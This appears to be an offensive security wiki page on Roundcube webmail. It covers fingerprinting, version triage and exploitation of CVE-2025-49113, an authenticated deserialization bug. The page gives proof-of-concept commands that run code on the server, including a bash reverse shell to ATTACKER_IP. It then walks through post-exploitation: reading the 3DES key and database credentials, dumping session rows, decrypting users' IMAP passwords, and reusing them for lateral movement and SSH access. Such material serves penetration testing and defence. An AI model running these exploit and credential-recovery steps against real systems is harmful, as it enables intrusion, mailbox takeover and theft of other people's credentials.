Roundcube


Overview

Roundcube is a PHP webmail client that is frequently exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints:

  • The HTML source often leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion)
  • Default application path in containers/VMs: /var/www/html/roundcube
  • Main configuration file: config/config.inc.php

Authenticated RCE via PHP object deserialization (CVE-2025-49113)

Affected versions (per vendor/NVD):

  • 1.6.x before 1.6.11
  • 1.5.x before 1.5.10
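To turn the two affected ranges above into a repeatable check over an inventory of hosts, here is an added example (not part of the original page); it assumes dotted version strings such as the ones fingerprinted from rcversion, and reports branches the advisory does not cover as "unknown" rather than guessing.

```python
"""Classify Roundcube version strings against the CVE-2025-49113 affected
ranges quoted on this page: 1.6.x before 1.6.11 and 1.5.x before 1.5.10.
Added example; the inventory below is a constructed sample."""
import re

# First patched patch level per branch, as listed on the page
FIXED = {(1, 6): 11, (1, 5): 10}


def parse_version(ver: str) -> tuple:
    """Parse '1.6.10', 'v1.6.10' or '1.6.10-rc1' into (major, minor, patch)."""
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", ver.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {ver!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def cve_2025_49113_status(ver: str) -> str:
    """Return 'vulnerable', 'fixed', or 'unknown' for branches not covered
    by the advisory ranges (e.g. 1.4.x), which need a separate decision."""
    major, minor, patch = parse_version(ver)
    fix = FIXED.get((major, minor))
    if fix is None:
        return "unknown"
    return "vulnerable" if patch < fix else "fixed"


def triage(inventory: dict) -> dict:
    """Group hosts by status; inventory maps hostname -> version string."""
    groups = {"vulnerable": [], "fixed": [], "unknown": []}
    for host, ver in inventory.items():
        groups[cve_2025_49113_status(ver)].append(host)
    return groups


if __name__ == "__main__":
    # Constructed sample inventory (hostnames and versions are made up)
    sample = {
        "mail-a.example.tld": "1.6.10",
        "mail-b.example.tld": "1.6.11",
        "mail-c.example.tld": "1.5.9",
        "mail-d.example.tld": "1.4.15",
    }
    for status, hosts in triage(sample).items():
        print(f"{status:10s} {', '.join(hosts) or '-'}")
```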

Bug summary

  • The _from parameter in program/actions/settings/upload.php is not sanitized, allowing injection of attacker-controlled data that Roundcube later unserializes, leading to gadget-chain execution and remote code execution in the web context (post-auth).

Quick exploitation

  • Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld)
  • Public PoC automates session handling, gadget crafting and the upload flow

git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
php CVE-2025-49113.php http://mail.target.tld USER PASS CMD

# examples
php CVE-2025-49113.php http://mail.target.tld user 'pass' "id"
# blind timing proof
time php CVE-2025-49113.php http://mail.target.tld user 'pass' "sleep 5"

# reverse shell
nc -nvlp 443
php CVE-2025-49113.php http://mail.target.tld user 'pass' \
"bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"

Notes

  • Command output is often not returned; use sleep N to confirm RCE
  • The resulting shell usually runs as www-data; on containerised deployments expect /.dockerenv and 172.17.0.0/16 networks

Post-exploitation: recover IMAP passwords from Roundcube sessions

Roundcube stores the current user's IMAP password in the session (database), encrypted with a server-side 3DES key configured in config.inc.php. With filesystem or DB access on the Roundcube host you can recover the plaintext passwords and log into mailboxes/other services (SSH credential reuse is common).

  1. Read the DB DSN and the 3DES key from the config

config/config.inc.php typically contains:

$config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str'; // 24‑byte key (3DES)
  2. Connect to the DB and dump the sessions

mysql -u roundcube -p roundcube
# or: mysql -u roundcube -pDB_PASS roundcube

mysql> SELECT id, created, changed, vars FROM session\G

The session.vars field is a Base64 blob produced by Roundcube's encrypt(): Base64( IV || 3DES-CBC(plaintext) ). The first 8 bytes after Base64-decoding are the IV.

  3. Find the password field

A quick way to locate the credential inside the session structure is to Base64-decode the session.vars field and eyeball the serialized entries:

echo 'BASE64_FROM_VARS' | base64 -d | tr ';' '\n' | grep -i password

  4. Decrypt using Roundcube's own helper

Roundcube ships a CLI that uses the same rcmail->decrypt() logic and the configured des_key:

cd /var/www/html/roundcube
./bin/decrypt.sh CIPHERTEXT_BASE64
# -> prints plaintext

  5. Unpacking 3DES-CBC manually (optional)
  • Ciphertext layout: Base64( IV(8B) || CT )
  • Algorithm: 3DES-CBC, 24-byte key, PKCS#7 padding

from base64 import b64decode

# Split the Base64 blob into the 8-byte IV prefix and the ciphertext body
iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
iv, ct = iv_ct[:8], iv_ct[8:]
print(iv.hex(), ct.hex())
# decrypt ct with 3DES-CBC using key = $config['des_key'] and IV = iv,
# then strip the PKCS#7 padding

Common locations

  • DB table: session (users table maps login names to IDs)
  • Config path: /var/www/html/roundcube/config/config.inc.php

Operational use

  • Old session rows often contain the IMAP passwords of previous users; decrypt multiple entries to move laterally into other mailboxes
  • Try recovered credentials against SSH or other services if credential reuse is suspected
